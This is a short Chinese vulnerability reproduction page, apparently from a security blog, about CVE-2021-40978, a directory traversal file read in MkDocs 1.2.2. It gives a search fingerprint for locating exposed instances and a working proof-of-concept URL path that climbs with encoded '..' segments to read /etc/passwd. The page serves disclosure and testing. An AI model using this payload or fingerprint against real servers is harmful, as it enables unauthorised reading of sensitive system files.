MKdocs 任意文件读取漏洞 #CVE-2021-40978

漏洞描述

MKdocs中存在通过 %2e%2e 来遍历目录,读取敏感文件。

漏洞影响

Mkdocs 1.2.2

网络测绘

title=”My Docs”

漏洞复现

主页面

20240407105322467-png (15)

验证POC

/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

20240407105358138-png (16)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容